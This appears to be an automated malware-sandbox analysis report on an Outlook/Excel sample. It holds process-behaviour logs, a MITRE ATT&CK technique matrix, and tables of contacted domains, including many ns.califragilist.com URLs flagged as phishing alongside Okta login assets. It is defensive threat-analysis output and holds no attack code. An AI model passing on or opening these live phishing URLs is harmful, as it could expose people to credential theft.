            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 464Jump to behavior
            Source: C:\Windows\splwow64.exeLast function: Thread delayed
            Source: C:\Windows\splwow64.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
            Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote Services1
            Clipboard Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Process Injection
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets13
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ns.califragilist.com/GDSherpa-bold.woff100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woff20%Avira URL Cloudsafe
            https://app.marmof.com/build/assets/Document-d618b903.js0%Avira URL Cloudsafe
            https://ns.califragilist.com/GDSherpa-bold.woff2100%Avira URL Cloudphishing
            https://ns.califragilist.com/yf76EadsgQyK5Jwh8E6cIKXM1akRlkqgnjcDg3IU0lvqLFvh100%Avira URL Cloudphishing
            https://ns.califragilist.com/cboOIeS9NKidIhE5DtVGZJdhr1AU8tkEd4AG7ei0Kkgcq100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma0zl7w0q5n-wu.wo0%Avira URL Cloudsafe
            https://ns.califragilist.com/yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179100%Avira URL Cloudphishing
            https://app.marmof.com/build/assets/Button-7c0475a9.js0%Avira URL Cloudsafe
            https://ns.califragilist.com/klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220100%Avira URL Cloudphishing
            https://ns.califragilist.com/wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130100%Avira URL Cloudphishing
            https://ns.califragilist.com/qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132100%Avira URL Cloudphishing
            https://ns.califragilist.com/xyAq43pQ3AarsEuef30100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woff0%Avira URL Cloudsafe
            https://app.marmof.com/favicon-32x32.png0%Avira URL Cloudsafe
            https://ns.califragilist.com/qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2zl7w0q5n-wu.wo0%Avira URL Cloudsafe
            https://app.marmof.com/build/assets/app-49265ad1.js0%Avira URL Cloudsafe
            https://app.marmof.com/build/assets/logotype-original-6f3eac48.js0%Avira URL Cloudsafe
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma25l7w0q5n-wu.wo0%Avira URL Cloudsafe
            https://ns.califragilist.com/34m8PEW3Ch1AL9UabKKEr8920100%Avira URL Cloudphishing
            https://ns.califragilist.com/ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170100%Avira URL Cloudphishing
            https://ns.califragilist.com/uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255100%Avira URL Cloudphishing
            https://ns.califragilist.com/GDSherpa-regular.woff100%Avira URL Cloudphishing
            https://ns.califragilist.com/exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1pl7w0q5n-wu.wo0%Avira URL Cloudsafe
            https://ns.califragilist.com/rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192100%Avira URL Cloudphishing
            https://ns.califragilist.com/mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2pl7w0q5n-wu.wo0%Avira URL Cloudsafe
            https://ns.califragilist.com/favicon.ico100%Avira URL Cloudphishing
            https://ns.califragilist.com/34ZDG48CiIUIKX2LghMRxuoYEP67110100%Avira URL Cloudphishing
            https://ns.califragilist.com/ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202100%Avira URL Cloudphishing
            https://ns.califragilist.com/GDSherpa-vf2.woff2100%Avira URL Cloudphishing
            https://ns.califragilist.com/GDSherpa-regular.woff2100%Avira URL Cloudphishing
            https://ns.califragilist.com/GDSherpa-vf.woff2100%Avira URL Cloudphishing
            https://ns.califragilist.com/xyi0aNMuJJrB8y7WGAXkiQfmja4dMwqOBavMS5zthEqgNsefw100%Avira URL Cloudphishing
            https://app.marmof.com/site.webmanifest0%Avira URL Cloudsafe
            https://app.marmof.com/build/assets/app-0b1f8530.css0%Avira URL Cloudsafe
            https://ns.califragilist.com/klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227100%Avira URL Cloudphishing
            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2jl7w0q5n-wu.wo0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            plausible.io
            169.150.236.104
            truefalse
              high
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                ns.califragilist.com
                188.114.97.3
                truefalse
                  high
                  github.com
                  140.82.121.4
                  truefalse
                    high
                    marmof.com
                    159.69.48.31
                    truefalse
                      unknown
                      s-part-0017.t-0009.t-msedge.net
                      13.107.246.45
                      truefalse
                        high
                        ui-avatars.com
                        104.26.8.185
                        truefalse
                          high
                          app.marmof.com
                          159.69.48.31
                          truefalse
                            high
                            code.jquery.com
                            151.101.2.137
                            truefalse
                              high
                              d2qumtq956sbet.cloudfront.net
                              18.66.147.86
                              truefalse
                                unknown
                                cdnjs.cloudflare.com
                                104.17.25.14
                                truefalse
                                  high
                                  challenges.cloudflare.com
                                  104.18.94.41
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.186.132
                                    truefalse
                                      high
                                      d19d360lklgih4.cloudfront.net
                                      13.33.187.120
                                      truefalse
                                        unknown
                                        objects.githubusercontent.com
                                        185.199.110.133
                                        truefalse
                                          high
                                          r.wdfl.co
                                          unknown
                                          unknownfalse
                                            high
                                            augloop.office.com
                                            unknown
                                            unknownfalse
                                              high
                                              ok4static.oktacdn.com
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                  high
                                                  https://ns.califragilist.com/GDSherpa-bold.wofftrue
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=4%2BsN3PZc97n6PKudD929%2FFkUrxNi6P45%2BA5%2FZoIdl6gmKsT4Jjb5aPVxKvKnboZaVG003A0NU44c5TgMDQUcn%2B2%2FnhKPjAHRzV%2FRwsTMOsIrLAUSVgQ%2FPWxyXChG3g%3D%3Dfalse
                                                    high
                                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                      high
                                                      https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5false
                                                        unknown
                                                        https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woff2false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://app.marmof.com/build/assets/Document-d618b903.jsfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ns.califragilist.com/GDSherpa-bold.woff2true
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://ns.califragilist.com/yf76EadsgQyK5Jwh8E6cIKXM1akRlkqgnjcDg3IU0lvqLFvhtrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://ns.califragilist.com/yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179true
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/false
                                                          high
                                                          https://ui-avatars.com/api/?name=A+J&color=ffffff&background=f34b1dfalse
                                                            high
                                                            https://ns.califragilist.com/klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220true
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            https://ns.califragilist.com/cboOIeS9NKidIhE5DtVGZJdhr1AU8tkEd4AG7ei0Kkgcqtrue
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            https://app.marmof.com/build/assets/Button-7c0475a9.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                high
                                                                https://ns.califragilist.com/wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130false
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://ns.califragilist.com/qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132false
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://ns.califragilist.com/xyAq43pQ3AarsEuef30false
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://ns.califragilist.com/qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240false
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://app.marmof.com/favicon-32x32.pngfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://app.marmof.com/build/assets/app-49265ad1.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://plausible.io/api/eventfalse
                                                                  high
                                                                  https://plausible.io/js/script.jsfalse
                                                                    high
                                                                    https://app.marmof.com/build/assets/logotype-original-6f3eac48.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ns.califragilist.com/34m8PEW3Ch1AL9UabKKEr8920false
                                                                    • Avira URL Cloud: phishing
                                                                    unknown
                                                                    https://ns.califragilist.com/7PXU/true
                                                                      unknown
                                                                      https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.jsfalse
                                                                        high
                                                                        https://ns.califragilist.com/ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170false
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                          high
                                                                          https://ns.califragilist.com/GDSherpa-regular.wofffalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://ns.califragilist.com/exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712false
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://ns.califragilist.com/uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255false
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                                            high
                                                                            https://ns.califragilist.com/favicon.icofalse
                                                                            • Avira URL Cloud: phishing
                                                                            unknown
                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8de644ce9b5745f6/1730908538244/-_ter8awBYLmx72false
                                                                              high
                                                                              https://ns.califragilist.com/rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192false
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://ns.califragilist.com/mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145false
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8de644ce9b5745f6&lang=autofalse
                                                                                high
                                                                                https://ns.califragilist.com/34ZDG48CiIUIKX2LghMRxuoYEP67110false
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://ns.califragilist.com/ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202false
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://ns.califragilist.com/GDSherpa-vf2.woff2false
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://ns.califragilist.com/GDSherpa-vf.woff2false
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://ns.califragilist.com/xyi0aNMuJJrB8y7WGAXkiQfmja4dMwqOBavMS5zthEqgNsefwfalse
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://ns.califragilist.com/GDSherpa-regular.woff2false
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://r.wdfl.co/rw.jsfalse
                                                                                  high
                                                                                  https://ns.califragilist.com/klsLwpUBDca0RxrYtZtR800jne0IqCzphswGY89y8d281n972UNwmgFEuHNXUPF6Bp4QvLcz5ab227false
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  https://app.marmof.com/build/assets/app-0b1f8530.cssfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://app.marmof.com/site.webmanifestfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://npms.io/search?q=ponyfill.chromecache_979.14.dr, chromecache_1030.14.drfalse
                                                                                    high
                                                                                    http://augloop.office.com/settings.jsonprep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drfalse
                                                                                      high
                                                                                      https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma0zl7w0q5n-wu.wochromecache_1007.14.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.google.comchromecache_1023.14.dr, chromecache_1033.14.drfalse
                                                                                        high
                                                                                        https://github.com/fent)chromecache_1022.14.dr, chromecache_1024.14.drfalse
                                                                                          high
                                                                                          https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1zl7w0q5nw.woffchromecache_1007.14.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma25l7w0q5n-wu.wochromecache_1007.14.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://openjsf.org/chromecache_979.14.dr, chromecache_1030.14.drfalse
                                                                                            high
                                                                                            https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2zl7w0q5n-wu.wochromecache_1007.14.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://json-schema.org/draft-07/schema#prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drfalse
                                                                                              high
                                                                                              https://lodash.com/chromecache_979.14.dr, chromecache_1030.14.drfalse
                                                                                                high
                                                                                                https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2pl7w0q5n-wu.wochromecache_1007.14.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://augloop.office.comApp1730908482691485400_D7CEFE08-05E6-4809-B291-F3E04FAC7956.log.0.drfalse
                                                                                                  high
                                                                                                  https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma1pl7w0q5n-wu.wochromecache_1007.14.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://cct.google/taggy/agent.jschromecache_1023.14.dr, chromecache_1033.14.drfalse
                                                                                                    high
                                                                                                    http://underscorejs.org/LICENSEchromecache_979.14.dr, chromecache_1030.14.drfalse
                                                                                                      high
                                                                                                      https://td.doubleclick.netchromecache_1023.14.dr, chromecache_1033.14.drfalse
                                                                                                        high
                                                                                                        https://lodash.com/licensechromecache_979.14.dr, chromecache_1030.14.drfalse
                                                                                                          high
                                                                                                          https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2jl7w0q5n-wu.wochromecache_1007.14.drfalse
